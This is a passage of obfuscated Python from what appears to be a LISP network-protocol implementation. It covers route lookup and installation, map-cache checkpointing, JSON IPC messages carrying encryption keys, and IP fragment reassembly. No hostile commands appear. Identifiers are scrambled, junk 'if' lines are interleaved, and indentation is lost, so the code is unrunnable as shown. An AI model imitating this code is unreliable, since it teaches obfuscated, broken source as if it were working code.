if 97 - 97: oO0o - O0 / II111iiii * II111iiii - oO0o * IiII
if 97 - 97: IiII % OoO0O00 . OoOoOO00 - Ii1I
if 28 - 28: O0 . I11i . I1IiiI - Ii1I - iII111i - iIii1I11I1II1
if 14 - 14: OOooOOo + ooOoO0o
if ( lisp_is_macos ( ) ) :
ooO0ooooO = "route -n get default"
oOOO0OoO = commands . getoutput ( ooO0ooooO ) . split ( "\n" )
iiiI1i1Iii1ii = II1i = None
for OOO000 in oOOO0OoO :
if ( OOO000 . find ( "gateway: " ) != - 1 ) : iiiI1i1Iii1ii = OOO000 . split ( ": " ) [ 1 ]
if ( OOO000 . find ( "interface: " ) != - 1 ) : II1i = OOO000 . split ( ": " ) [ 1 ]
if 72 - 72: iIii1I11I1II1 - I1IiiI * OoO0O00 * o0oOOo0O0Ooo - I1IiiI . I1ii11iIi11i
return ( [ [ II1i , iiiI1i1Iii1ii ] ] )
if 46 - 46: i1IIi . OoOoOO00 . I1Ii111
if 84 - 84: OoOoOO00 * OoOoOO00 % o0oOOo0O0Ooo * II111iiii
if 28 - 28: ooOoO0o % OoOoOO00 + ooOoO0o
if 68 - 68: II111iiii
if 71 - 71: I1Ii111 % Ii1I - I11i / I11i - Ii1I
ooO0ooooO = "ip route | egrep 'default via'"
O0o00o000 = commands . getoutput ( ooO0ooooO ) . split ( "\n" )
if 54 - 54: Oo0Ooo . OoO0O00 * iII111i . i1IIi - o0oOOo0O0Ooo
O0OoooOoo = [ ]
for o0O00OOo in O0o00o000 :
if ( o0O00OOo . find ( " metric " ) != - 1 ) : continue
O0OOOO0o0O = o0O00OOo . split ( " " )
try :
I1iI11I1i = O0OOOO0o0O . index ( "via" ) + 1
if ( I1iI11I1i >= len ( O0OOOO0o0O ) ) : continue
OO0OoOOoO00Oo = O0OOOO0o0O . index ( "dev" ) + 1
if ( OO0OoOOoO00Oo >= len ( O0OOOO0o0O ) ) : continue
except :
continue
if 94 - 94: O0 - OoooooooOO / OOooOOo
if 52 - 52: IiII % OOooOOo . II111iiii + IiII + i11iIiiIii * iIii1I11I1II1
O0OoooOoo . append ( [ O0OOOO0o0O [ OO0OoOOoO00Oo ] , O0OOOO0o0O [ I1iI11I1i ] ] )
if 21 - 21: OoooooooOO + iIii1I11I1II1 + OoOoOO00 . II111iiii . Ii1I / iII111i
return ( O0OoooOoo )
if 69 - 69: iIii1I11I1II1 % I1Ii111 % OOooOOo + O0 - OoOoOO00 % oO0o
if 70 - 70: oO0o - I1IiiI + Ii1I
if 54 - 54: OoOoOO00 / ooOoO0o - I1IiiI
if 37 - 37: o0oOOo0O0Ooo
if 57 - 57: iII111i / i1IIi / i1IIi + IiII
if 75 - 75: IiII / O0
if 72 - 72: I11i
def lisp_get_host_route_next_hop ( rloc ) :
ooO0ooooO = "ip route | egrep '{} via'" . format ( rloc )
o0O00OOo = commands . getoutput ( ooO0ooooO ) . split ( " " )
if 35 - 35: I11i % OoooooooOO / i1IIi * i1IIi / I1IiiI
try : ooo = o0O00OOo . index ( "via" ) + 1
except : return ( None )
if 42 - 42: I11i - i1IIi - oO0o / I11i + Ii1I + ooOoO0o
if ( ooo >= len ( o0O00OOo ) ) : return ( None )
return ( o0O00OOo [ ooo ] )
if 23 - 23: OoOoOO00 . oO0o - iII111i
if 27 - 27: Oo0Ooo * OOooOOo - OoOoOO00
if 1 - 1: II111iiii * i11iIiiIii . OoooooooOO
if 37 - 37: OoooooooOO + O0 . I11i % OoOoOO00
if 57 - 57: I1Ii111 . OOooOOo + I1Ii111 . iIii1I11I1II1 / oO0o / O0
if 88 - 88: I1Ii111
if 16 - 16: Oo0Ooo . ooOoO0o / OoO0O00 / o0oOOo0O0Ooo . OoooooooOO * OoO0O00
def lisp_install_host_route ( dest , nh , install ) :
install = "add" if install else "delete"
OO0oooO = "none" if nh == None else nh
if 50 - 50: II111iiii + I11i . OoooooooOO . I1Ii111 - OOooOOo
lprint ( "{} host-route {}, nh {}" . format ( install . title ( ) , dest , OO0oooO ) )
if 83 - 83: oO0o
if ( nh == None ) :
iI1I1 = "ip route {} {}/32" . format ( install , dest )
else :
iI1I1 = "ip route {} {}/32 via {}" . format ( install , dest , nh )
if 100 - 100: I1Ii111 + o0oOOo0O0Ooo * oO0o / oO0o . oO0o + iII111i
os . system ( iI1I1 )
return
if 71 - 71: II111iiii + iII111i + O0 % Oo0Ooo / I1IiiI
if 52 - 52: Oo0Ooo . I1Ii111 * i1IIi / Oo0Ooo / OoO0O00
if 29 - 29: iII111i
if 91 - 91: Oo0Ooo - IiII
if 47 - 47: iII111i / OOooOOo + iII111i
if 69 - 69: I1IiiI . I1ii11iIi11i
if 18 - 18: I11i * I1IiiI
if 42 - 42: i1IIi . I1Ii111 - ooOoO0o + I11i / oO0o
def lisp_checkpoint ( checkpoint_list ) :
if ( lisp_checkpoint_map_cache == False ) : return
if 60 - 60: i1IIi + OoooooooOO % i11iIiiIii / IiII % Oo0Ooo + I1IiiI
OOO000 = open ( lisp_checkpoint_filename , "w" )
for i1ii1i1Ii11 in checkpoint_list :
OOO000 . write ( i1ii1i1Ii11 + "\n" )
if 87 - 87: Ii1I % OoooooooOO % I1Ii111 * i11iIiiIii * OoOoOO00
OOO000 . close ( )
lprint ( "{} {} entries to file '{}'" . format ( bold ( "Checkpoint" , False ) ,
len ( checkpoint_list ) , lisp_checkpoint_filename ) )
return
if 78 - 78: I11i
if 62 - 62: iIii1I11I1II1 . o0oOOo0O0Ooo . ooOoO0o % oO0o % O0 % oO0o
if 51 - 51: Oo0Ooo / IiII - Oo0Ooo
if 71 - 71: I11i * I1ii11iIi11i * OOooOOo * o0oOOo0O0Ooo
if 53 - 53: I1IiiI % I1IiiI
if 80 - 80: OoO0O00 - i11iIiiIii / iII111i * I1ii11iIi11i / I1IiiI - I1Ii111
if 85 - 85: IiII
if 72 - 72: iII111i * OoOoOO00
def lisp_load_checkpoint ( ) :
if ( lisp_checkpoint_map_cache == False ) : return
if ( os . path . exists ( lisp_checkpoint_filename ) == False ) : return
if 65 - 65: iIii1I11I1II1 / iIii1I11I1II1 % O0 / II111iiii . OOooOOo . O0
OOO000 = open ( lisp_checkpoint_filename , "r" )
if 65 - 65: I11i
I1I1 = 0
for i1ii1i1Ii11 in OOO000 :
I1I1 += 1
oOo = i1ii1i1Ii11 . split ( " rloc " )
ooOOo = [ ] if ( oOo [ 1 ] in [ "native-forward\n" , "\n" ] ) else oOo [ 1 ] . split ( ", " )
if 35 - 35: o0oOOo0O0Ooo - i11iIiiIii
if 78 - 78: ooOoO0o - II111iiii - i1IIi
OoO0oOOooOO = [ ]
for I1IIiIIIii in ooOOo :
i1III111 = lisp_rloc ( False )
O0OOOO0o0O = I1IIiIIIii . split ( " " )
i1III111 . rloc . store_address ( O0OOOO0o0O [ 0 ] )
i1III111 . priority = int ( O0OOOO0o0O [ 1 ] )
i1III111 . weight = int ( O0OOOO0o0O [ 2 ] )
OoO0oOOooOO . append ( i1III111 )
if 18 - 18: OoooooooOO % OoOoOO00 - IiII / oO0o . OOooOOo . I1IiiI
if 77 - 77: I1ii11iIi11i . OoO0O00 / OoOoOO00 / O0
o0o000Oo = lisp_mapping ( "" , "" , OoO0oOOooOO )
if ( o0o000Oo != None ) :
o0o000Oo . eid . store_prefix ( oOo [ 0 ] )
o0o000Oo . checkpoint_entry = True
o0o000Oo . map_cache_ttl = LISP_NMR_TTL * 60
if ( OoO0oOOooOO == [ ] ) : o0o000Oo . action = LISP_NATIVE_FORWARD_ACTION
o0o000Oo . add_cache ( )
continue
if 67 - 67: ooOoO0o % I11i % oO0o
if 74 - 74: II111iiii
I1I1 -= 1
if 44 - 44: Oo0Ooo + OoO0O00 + OoOoOO00 - I1IiiI
if 68 - 68: i11iIiiIii / OOooOOo . i1IIi . i11iIiiIii . I11i
OOO000 . close ( )
lprint ( "{} {} map-cache entries from file '{}'" . format (
bold ( "Loaded" , False ) , I1I1 , lisp_checkpoint_filename ) )
return
if 56 - 56: iIii1I11I1II1 - II111iiii * i1IIi / Ii1I
if 65 - 65: OOooOOo / I1IiiI . OoooooooOO + I1IiiI + OoooooooOO + i11iIiiIii
if 20 - 20: I1IiiI + iII111i + O0 * O0
if 18 - 18: I11i - I11i . OoOoOO00 . ooOoO0o
if 31 - 31: ooOoO0o
if 87 - 87: OoooooooOO + OOooOOo - I1ii11iIi11i / I1IiiI + ooOoO0o - Oo0Ooo
if 19 - 19: ooOoO0o + I1ii11iIi11i - ooOoO0o
if 17 - 17: I11i * i1IIi + iIii1I11I1II1 % I1IiiI
if 44 - 44: IiII + I1IiiI . Ii1I % Oo0Ooo
if 97 - 97: O0
if 95 - 95: OoO0O00 % iII111i / I1IiiI * OoooooooOO
if 31 - 31: iIii1I11I1II1
if 62 - 62: o0oOOo0O0Ooo - iII111i / II111iiii . o0oOOo0O0Ooo
if 20 - 20: iIii1I11I1II1 % OOooOOo
def lisp_write_checkpoint_entry ( checkpoint_list , mc ) :
if ( lisp_checkpoint_map_cache == False ) : return
if 91 - 91: ooOoO0o
i1ii1i1Ii11 = "{} rloc " . format ( mc . eid . print_prefix ( ) )
if 96 - 96: I1IiiI . OOooOOo
for i1III111 in mc . rloc_set :
if ( i1III111 . rloc . is_null ( ) ) : continue
i1ii1i1Ii11 += "{} {} {}, " . format ( i1III111 . rloc . print_address_no_iid ( ) ,
i1III111 . priority , i1III111 . weight )
if 94 - 94: OoooooooOO + II111iiii % ooOoO0o - II111iiii / O0
if 34 - 34: IiII % oO0o
if ( mc . rloc_set != [ ] ) :
i1ii1i1Ii11 = i1ii1i1Ii11 [ 0 : - 2 ]
elif ( mc . action == LISP_NATIVE_FORWARD_ACTION ) :
i1ii1i1Ii11 += "native-forward"
if 54 - 54: I1IiiI
if 80 - 80: OoOoOO00 . I1IiiI / I1ii11iIi11i . iII111i
checkpoint_list . append ( i1ii1i1Ii11 )
return
if 31 - 31: I11i * o0oOOo0O0Ooo
if 17 - 17: Ii1I * iIii1I11I1II1
if 9 - 9: o0oOOo0O0Ooo - IiII
if 78 - 78: i11iIiiIii . o0oOOo0O0Ooo
if 72 - 72: Oo0Ooo % II111iiii + O0 * OoOoOO00 - OOooOOo + I1Ii111
if 23 - 23: I1IiiI - O0 - iII111i . II111iiii / oO0o
if 1 - 1: I11i . OOooOOo / oO0o % I11i * Oo0Ooo + Oo0Ooo
def lisp_check_dp_socket ( ) :
i1Ii11IIIi = lisp_ipc_dp_socket_name
if ( os . path . exists ( i1Ii11IIIi ) == False ) :
ooO0 = bold ( "does not exist" , False )
lprint ( "Socket '{}' {}" . format ( i1Ii11IIIi , ooO0 ) )
return ( False )
if 43 - 43: I1ii11iIi11i - Oo0Ooo . oO0o
return ( True )
if 2 - 2: OoOoOO00 . I1IiiI
if 88 - 88: I1IiiI
if 34 - 34: ooOoO0o + I1Ii111 / iIii1I11I1II1 + Ii1I . o0oOOo0O0Ooo * OoO0O00
if 74 - 74: i1IIi / iIii1I11I1II1 . I1ii11iIi11i
if 71 - 71: ooOoO0o % ooOoO0o * iII111i / Ii1I * O0
if 21 - 21: o0oOOo0O0Ooo * o0oOOo0O0Ooo - OoOoOO00 % OoOoOO00
if 8 - 8: I1ii11iIi11i
def lisp_write_to_dp_socket ( entry ) :
try :
II1i1I1IIiII1 = json . dumps ( entry )
O00oOooo0o = bold ( "Write IPC" , False )
lprint ( "{} record to named socket: '{}'" . format ( O00oOooo0o , II1i1I1IIiII1 ) )
lisp_ipc_dp_socket . sendto ( II1i1I1IIiII1 , lisp_ipc_dp_socket_name )
except :
lprint ( "Failed to write IPC record to named socket: '{}'" . format ( II1i1I1IIiII1 ) )
if 95 - 95: I1Ii111 % o0oOOo0O0Ooo . I1Ii111
return
if 23 - 23: Ii1I - OOooOOo + oO0o
if 62 - 62: I1IiiI . oO0o - I1IiiI / o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 53 - 53: i1IIi + OoOoOO00 / i1IIi * o0oOOo0O0Ooo
if 47 - 47: OoooooooOO * Ii1I % i1IIi . oO0o * iIii1I11I1II1 * I1ii11iIi11i
if 43 - 43: o0oOOo0O0Ooo * OoooooooOO % IiII . Oo0Ooo / OoO0O00
if 51 - 51: Oo0Ooo / OoOoOO00 - OoooooooOO
if 57 - 57: Ii1I
if 52 - 52: oO0o % I1ii11iIi11i % i11iIiiIii
if 8 - 8: i1IIi * i11iIiiIii - ooOoO0o / IiII - oO0o
def lisp_write_ipc_keys ( rloc ) :
oo0o00OO = rloc . rloc . print_address_no_iid ( )
Oo0O00O = rloc . translated_port
if ( Oo0O00O != 0 ) : oo0o00OO += ":" + str ( Oo0O00O )
if ( lisp_rloc_probe_list . has_key ( oo0o00OO ) == False ) : return
if 29 - 29: OoooooooOO / iII111i + I1IiiI % I11i - Ii1I
for O0OOOO0o0O , oOo , i11ii in lisp_rloc_probe_list [ oo0o00OO ] :
o0o000Oo = lisp_map_cache . lookup_cache ( oOo , True )
if ( o0o000Oo == None ) : continue
lisp_write_ipc_map_cache ( True , o0o000Oo )
if 75 - 75: i1IIi
return
if 80 - 80: O0
if 16 - 16: OOooOOo - iII111i
if 5 - 5: o0oOOo0O0Ooo % ooOoO0o % O0 % I1ii11iIi11i + Oo0Ooo
if 82 - 82: oO0o / iIii1I11I1II1 % ooOoO0o . Ii1I / i1IIi - I1Ii111
if 15 - 15: I11i - OOooOOo . II111iiii . iIii1I11I1II1
if 93 - 93: I11i + o0oOOo0O0Ooo / OOooOOo + Ii1I % Oo0Ooo % I1ii11iIi11i
if 72 - 72: IiII / II111iiii
def lisp_write_ipc_map_cache ( add_or_delete , mc , dont_send = False ) :
if ( lisp_i_am_etr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 25 - 25: i1IIi + OoOoOO00 + oO0o + OoooooooOO
if 21 - 21: I1ii11iIi11i
if 60 - 60: i1IIi / OoO0O00 . Ii1I
if 16 - 16: i11iIiiIii + OoOoOO00 % Oo0Ooo + I1ii11iIi11i * Ii1I / I1Ii111
IiI1III = "add" if add_or_delete else "delete"
i1ii1i1Ii11 = { "type" : "map-cache" , "opcode" : IiI1III }
if 26 - 26: iII111i
o0oO0O00 = ( mc . group . is_null ( ) == False )
if ( o0oO0O00 ) :
i1ii1i1Ii11 [ "eid-prefix" ] = mc . group . print_prefix_no_iid ( )
i1ii1i1Ii11 [ "rles" ] = [ ]
else :
i1ii1i1Ii11 [ "eid-prefix" ] = mc . eid . print_prefix_no_iid ( )
i1ii1i1Ii11 [ "rlocs" ] = [ ]
if 31 - 31: iII111i
i1ii1i1Ii11 [ "instance-id" ] = str ( mc . eid . instance_id )
if 45 - 45: OoO0O00
if ( o0oO0O00 ) :
if ( len ( mc . rloc_set ) >= 1 and mc . rloc_set [ 0 ] . rle ) :
for Iii in mc . rloc_set [ 0 ] . rle . rle_forwarding_list :
IiiIIi1 = Iii . address . print_address_no_iid ( )
Oo0O00O = str ( 4341 ) if Iii . translated_port == 0 else str ( Iii . translated_port )
if 55 - 55: iIii1I11I1II1 % iIii1I11I1II1 + I11i - ooOoO0o + I1IiiI * O0
O0OOOO0o0O = { "rle" : IiiIIi1 , "port" : Oo0O00O }
II11iI11i1 , I11ii1i = Iii . get_encap_keys ( )
O0OOOO0o0O = lisp_build_json_keys ( O0OOOO0o0O , II11iI11i1 , I11ii1i , "encrypt-key" )
i1ii1i1Ii11 [ "rles" ] . append ( O0OOOO0o0O )
if 34 - 34: OoO0O00 + Oo0Ooo . OoOoOO00 * OOooOOo
if 86 - 86: IiII * OOooOOo + Ii1I
else :
for I1IIiIIIii in mc . rloc_set :
if ( I1IIiIIIii . rloc . is_ipv4 ( ) == False and I1IIiIIIii . rloc . is_ipv6 ( ) == False ) :
continue
if 62 - 62: I11i
if ( I1IIiIIIii . up_state ( ) == False ) : continue
if 86 - 86: Oo0Ooo % II111iiii + I1Ii111 / I1ii11iIi11i
Oo0O00O = str ( 4341 ) if I1IIiIIIii . translated_port == 0 else str ( I1IIiIIIii . translated_port )
if 15 - 15: I1IiiI / I1Ii111 % iII111i
O0OOOO0o0O = { "rloc" : I1IIiIIIii . rloc . print_address_no_iid ( ) , "priority" :
str ( I1IIiIIIii . priority ) , "weight" : str ( I1IIiIIIii . weight ) , "port" :
Oo0O00O }
II11iI11i1 , I11ii1i = I1IIiIIIii . get_encap_keys ( )
O0OOOO0o0O = lisp_build_json_keys ( O0OOOO0o0O , II11iI11i1 , I11ii1i , "encrypt-key" )
i1ii1i1Ii11 [ "rlocs" ] . append ( O0OOOO0o0O )
if 57 - 57: I1Ii111 . iIii1I11I1II1 / Oo0Ooo / IiII / iII111i * OoOoOO00
if 35 - 35: i1IIi + I1Ii111 - ooOoO0o . I1ii11iIi11i + Oo0Ooo
if 43 - 43: oO0o . OoO0O00 * i1IIi
if ( dont_send == False ) : lisp_write_to_dp_socket ( i1ii1i1Ii11 )
return ( i1ii1i1Ii11 )
if 1 - 1: ooOoO0o / i1IIi
if 42 - 42: I1ii11iIi11i * ooOoO0o + OoOoOO00 % I1ii11iIi11i . IiII
if 75 - 75: OoO0O00 * i1IIi - OOooOOo % II111iiii % OoO0O00 - OoOoOO00
if 75 - 75: I11i * IiII * ooOoO0o
if 31 - 31: Ii1I
if 72 - 72: OOooOOo * Ii1I % OoO0O00
if 72 - 72: OoOoOO00 + o0oOOo0O0Ooo - i1IIi - OoO0O00 % OoOoOO00
def lisp_write_ipc_decap_key ( rloc_addr , keys ) :
if ( lisp_i_am_itr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 42 - 42: oO0o / i1IIi . IiII
if 12 - 12: i11iIiiIii . ooOoO0o
if 80 - 80: O0 / iIii1I11I1II1 % iII111i * ooOoO0o / i11iIiiIii . OoOoOO00
if 88 - 88: OoooooooOO . I1IiiI
if ( keys == None or len ( keys ) == 0 or keys [ 1 ] == None ) : return
if 6 - 6: I1Ii111 - i11iIiiIii - oO0o
II11iI11i1 = keys [ 1 ] . encrypt_key
I11ii1i = keys [ 1 ] . icv_key
if 7 - 7: i1IIi
if 6 - 6: OoooooooOO - Oo0Ooo - I1ii11iIi11i
if 34 - 34: iII111i + i11iIiiIii . IiII
if 54 - 54: Oo0Ooo + I11i - iII111i * ooOoO0o % i11iIiiIii . IiII
ii1iiIi1I1 = rloc_addr . split ( ":" )
if ( len ( ii1iiIi1I1 ) == 1 ) :
i1ii1i1Ii11 = { "type" : "decap-keys" , "rloc" : ii1iiIi1I1 [ 0 ] }
else :
i1ii1i1Ii11 = { "type" : "decap-keys" , "rloc" : ii1iiIi1I1 [ 0 ] , "port" : ii1iiIi1I1 [ 1 ] }
if 51 - 51: OoooooooOO . Ii1I % OoooooooOO - I1IiiI + I1Ii111 % oO0o
i1ii1i1Ii11 = lisp_build_json_keys ( i1ii1i1Ii11 , II11iI11i1 , I11ii1i , "decrypt-key" )
if 28 - 28: i11iIiiIii - I1IiiI * OoO0O00
lisp_write_to_dp_socket ( i1ii1i1Ii11 )
return
if 19 - 19: OoooooooOO
if 34 - 34: OoOoOO00 . oO0o
if 53 - 53: oO0o + OoooooooOO * ooOoO0o
if 85 - 85: I1ii11iIi11i - o0oOOo0O0Ooo % o0oOOo0O0Ooo % iII111i * OoOoOO00
if 50 - 50: I1Ii111 + I1Ii111 + I11i - OoOoOO00
if 65 - 65: oO0o / I11i + iII111i - I1ii11iIi11i
if 80 - 80: II111iiii . i11iIiiIii
if 66 - 66: ooOoO0o * iII111i * OOooOOo % OoO0O00 / I1ii11iIi11i
def lisp_build_json_keys ( entry , ekey , ikey , key_type ) :
if ( ekey == None ) : return ( entry )
if 33 - 33: iIii1I11I1II1
entry [ "keys" ] = [ ]
Oo000O000 = { "key-id" : "1" , key_type : ekey , "icv-key" : ikey }
entry [ "keys" ] . append ( Oo000O000 )
return ( entry )
if 52 - 52: iIii1I11I1II1 + O0
if 84 - 84: OOooOOo / iII111i . I1IiiI / O0 % OOooOOo . iII111i
if 32 - 32: OoO0O00 + OoO0O00 % o0oOOo0O0Ooo / O0
if 29 - 29: iII111i % I1Ii111
if 95 - 95: OOooOOo - ooOoO0o % i1IIi / O0 % I11i . IiII
if 63 - 63: ooOoO0o
if 22 - 22: OOooOOo . i11iIiiIii + II111iiii - Oo0Ooo % i1IIi / o0oOOo0O0Ooo
def lisp_write_ipc_database_mappings ( ephem_port ) :
if ( lisp_i_am_etr == False ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 90 - 90: IiII
if 38 - 38: i1IIi / ooOoO0o / I11i * I1ii11iIi11i / II111iiii . iIii1I11I1II1
if 52 - 52: I1ii11iIi11i % ooOoO0o * Ii1I * IiII + IiII / i11iIiiIii
if 51 - 51: iIii1I11I1II1 * o0oOOo0O0Ooo % o0oOOo0O0Ooo . Ii1I / OoooooooOO
i1ii1i1Ii11 = { "type" : "database-mappings" , "database-mappings" : [ ] }
if 23 - 23: oO0o * I1IiiI - oO0o - ooOoO0o . IiII / i11iIiiIii
if 53 - 53: Ii1I * Ii1I . OoOoOO00 . OOooOOo / I1ii11iIi11i % O0
if 98 - 98: OOooOOo
if 11 - 11: OOooOOo * iIii1I11I1II1 % IiII - I1IiiI . I11i
for ooOOo0ooo in lisp_db_list :
if ( ooOOo0ooo . eid . is_ipv4 ( ) == False and ooOOo0ooo . eid . is_ipv6 ( ) == False ) : continue
III1II11i1 = { "instance-id" : str ( ooOOo0ooo . eid . instance_id ) ,
"eid-prefix" : ooOOo0ooo . eid . print_prefix_no_iid ( ) }
i1ii1i1Ii11 [ "database-mappings" ] . append ( III1II11i1 )
if 62 - 62: i11iIiiIii % iIii1I11I1II1 / IiII . I1IiiI * O0
lisp_write_to_dp_socket ( i1ii1i1Ii11 )
if 17 - 17: I1ii11iIi11i - I1Ii111 % II111iiii + OOooOOo
if 45 - 45: I1Ii111 + iII111i - iIii1I11I1II1 / Oo0Ooo
if 92 - 92: iIii1I11I1II1 . OoO0O00 - I11i % I1ii11iIi11i / i11iIiiIii
if 4 - 4: Oo0Ooo / I1IiiI * i1IIi . II111iiii
if 13 - 13: i1IIi
i1ii1i1Ii11 = { "type" : "etr-nat-port" , "port" : ephem_port }
lisp_write_to_dp_socket ( i1ii1i1Ii11 )
return
if 39 - 39: OOooOOo
if 73 - 73: OoO0O00 . ooOoO0o
if 13 - 13: o0oOOo0O0Ooo - OoOoOO00
if 60 - 60: OoO0O00
if 17 - 17: i11iIiiIii % i1IIi % I1IiiI % ooOoO0o + I1Ii111 + Oo0Ooo
if 16 - 16: iII111i . I1ii11iIi11i . oO0o . OoO0O00
if 90 - 90: i1IIi . ooOoO0o + i11iIiiIii * OoooooooOO
def lisp_write_ipc_interfaces ( ) :
if ( lisp_i_am_etr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 30 - 30: iII111i . OoO0O00 . i11iIiiIii / I1ii11iIi11i * Oo0Ooo
if 38 - 38: IiII + II111iiii
if 20 - 20: iII111i * I1IiiI * iII111i - o0oOOo0O0Ooo + i1IIi + ooOoO0o
if 49 - 49: II111iiii * I1IiiI / oO0o
i1ii1i1Ii11 = { "type" : "interfaces" , "interfaces" : [ ] }
if 50 - 50: Ii1I + O0 . I1IiiI * Oo0Ooo
for II1i in lisp_myinterfaces . values ( ) :
if ( II1i . instance_id == None ) : continue
III1II11i1 = { "interface" : II1i . device ,
"instance-id" : str ( II1i . instance_id ) }
i1ii1i1Ii11 [ "interfaces" ] . append ( III1II11i1 )
if 15 - 15: Oo0Ooo
if 53 - 53: OoooooooOO * O0 / iII111i * ooOoO0o % I1Ii111 + OOooOOo
lisp_write_to_dp_socket ( i1ii1i1Ii11 )
return
if 95 - 95: I1Ii111 % OoOoOO00 . IiII * iII111i % Ii1I
if 18 - 18: iIii1I11I1II1 / ooOoO0o / I1Ii111 % oO0o * Ii1I
if 14 - 14: oO0o
if 72 - 72: iIii1I11I1II1 / II111iiii * II111iiii + I1IiiI + iIii1I11I1II1 + oO0o
if 46 - 46: I1Ii111
if 23 - 23: Oo0Ooo * IiII - I1Ii111 . OoooooooOO
if 78 - 78: OoOoOO00 - iIii1I11I1II1
if 20 - 20: i1IIi
if 72 - 72: ooOoO0o . II111iiii
if 32 - 32: I1Ii111 - oO0o + OoooooooOO . OoOoOO00 + i11iIiiIii / i1IIi
if 26 - 26: I1IiiI + OoooooooOO % OoOoOO00 . IiII - II111iiii . OoOoOO00
if 37 - 37: OoO0O00 % O0 + OoOoOO00 * I11i . Ii1I * OoO0O00
if 18 - 18: o0oOOo0O0Ooo / OOooOOo
if 28 - 28: O0 / Ii1I - oO0o % I1ii11iIi11i % O0 . OoO0O00
def lisp_parse_auth_key ( value ) :
O0ooooooOo0 = value . split ( "[" )
ooO0oOO0oOo00 = { }
if ( len ( O0ooooooOo0 ) == 1 ) :
ooO0oOO0oOo00 [ 0 ] = value
return ( ooO0oOO0oOo00 )
if 44 - 44: O0
if 12 - 12: I1ii11iIi11i
for OOOOOOOo00 in O0ooooooOo0 :
if ( OOOOOOOo00 == "" ) : continue
ooo = OOOOOOOo00 . find ( "]" )
I1I1I1 = OOOOOOOo00 [ 0 : ooo ]
try : I1I1I1 = int ( I1I1I1 )
except : return
if 80 - 80: oO0o / i1IIi * iIii1I11I1II1
ooO0oOO0oOo00 [ I1I1I1 ] = OOOOOOOo00 [ ooo + 1 : : ]
if 38 - 38: Ii1I
return ( ooO0oOO0oOo00 )
if 20 - 20: iIii1I11I1II1 + Oo0Ooo - Ii1I / i11iIiiIii . OoO0O00
if 66 - 66: OoooooooOO - Ii1I / iII111i . I1IiiI + I1ii11iIi11i - I1Ii111
if 36 - 36: I1Ii111 - OoO0O00 . I1ii11iIi11i * I1ii11iIi11i
if 9 - 9: OOooOOo - oO0o - iIii1I11I1II1 * i11iIiiIii / I11i
if 2 - 2: i1IIi % iII111i * ooOoO0o / OoOoOO00 + Oo0Ooo
if 59 - 59: i11iIiiIii / I1IiiI * iII111i
if 16 - 16: i11iIiiIii * II111iiii - ooOoO0o
if 80 - 80: iIii1I11I1II1 + iIii1I11I1II1 + I1Ii111 - IiII * iII111i - Ii1I
if 89 - 89: O0 * ooOoO0o
if 36 - 36: I1ii11iIi11i * II111iiii * iII111i + I1IiiI + OoO0O00 + oO0o
if 28 - 28: Ii1I - i11iIiiIii . oO0o / II111iiii
if 82 - 82: iII111i * iII111i . IiII * II111iiii
if 17 - 17: OoooooooOO % I1Ii111 * I1Ii111 / II111iiii . OoOoOO00 * iII111i
if 80 - 80: IiII % i11iIiiIii
if 6 - 6: II111iiii + i11iIiiIii - Oo0Ooo % OOooOOo + Oo0Ooo
if 46 - 46: iII111i
def lisp_reassemble ( packet ) :
oo00o00O0 = socket . ntohs ( struct . unpack ( "H" , packet [ 6 : 8 ] ) [ 0 ] )
if 31 - 31: OoO0O00 + I1Ii111 / iIii1I11I1II1
if 11 - 11: ooOoO0o - OoOoOO00
if 19 - 19: O0 . OoOoOO00 - i1IIi . oO0o
if 96 - 96: o0oOOo0O0Ooo % o0oOOo0O0Ooo - OoO0O00 * iIii1I11I1II1 + ooOoO0o - ooOoO0o
if ( oo00o00O0 == 0 or oo00o00O0 == 0x4000 ) : return ( packet )
if 4 - 4: OoO0O00 - OOooOOo
if 21 - 21: I1Ii111 * i11iIiiIii
if 63 - 63: oO0o + OoOoOO00
if 50 - 50: o0oOOo0O0Ooo / Oo0Ooo * ooOoO0o * Ii1I
i11iiI = socket . ntohs ( struct . unpack ( "H" , packet [ 4 : 6 ] ) [ 0 ] )
ooO00Oo = socket . ntohs ( struct . unpack ( "H" , packet [ 2 : 4 ] ) [ 0 ] )
if 97 - 97: I1IiiI / oO0o + I1Ii111 + I1Ii111
OOO00O0oO0 = ( oo00o00O0 & 0x2000 == 0 and ( oo00o00O0 & 0x1fff ) != 0 )
i1ii1i1Ii11 = [ ( oo00o00O0 & 0x1fff ) * 8 , ooO00Oo - 20 , packet , OOO00O0oO0 ]
if 79 - 79: ooOoO0o % OoooooooOO
if 67 - 67: I1IiiI + OoooooooOO % OoO0O00 . OoooooooOO + I11i / oO0o
if 33 - 33: I1ii11iIi11i
if 5 - 5: O0
if 50 - 50: Oo0Ooo % IiII * oO0o
if 71 - 71: OoO0O00
if 64 - 64: OoO0O00 - I1ii11iIi11i % OoO0O00 + OoOoOO00 - Oo0Ooo * I1ii11iIi11i
if 78 - 78: I1Ii111 % OoO0O00 . IiII % iIii1I11I1II1 / OoO0O00
if ( oo00o00O0 == 0x2000 ) :
oo0O , O0o0o0ooO0ooo = struct . unpack ( "HH" , packet [ 20 : 24 ] )
oo0O = socket . ntohs ( oo0O )
O0o0o0ooO0ooo = socket . ntohs ( O0o0o0ooO0ooo )
if ( O0o0o0ooO0ooo not in [ 4341 , 8472 , 4789 ] and oo0O != 4341 ) :
lisp_reassembly_queue [ i11iiI ] = [ ]
i1ii1i1Ii11 [ 2 ] = None
if 34 - 34: iIii1I11I1II1
if 33 - 33: I1ii11iIi11i + I1Ii111 * ooOoO0o / i11iIiiIii
if 83 - 83: oO0o
if 93 - 93: II111iiii
if 89 - 89: OoO0O00 % II111iiii % iII111i
if 66 - 66: OoooooooOO % iII111i % i11iIiiIii
if ( lisp_reassembly_queue . has_key ( i11iiI ) == False ) :
lisp_reassembly_queue [ i11iiI ] = [ ]
if 35 - 35: OoooooooOO - IiII
if 38 - 38: I1Ii111 % I11i . I11i % I11i + OoOoOO00
if 79 - 79: I1ii11iIi11i + OoO0O00 * I1ii11iIi11i / I11i
if 13 - 13: OoOoOO00 . iII111i
if 11 - 11: Oo0Ooo - Ii1I / OoO0O00
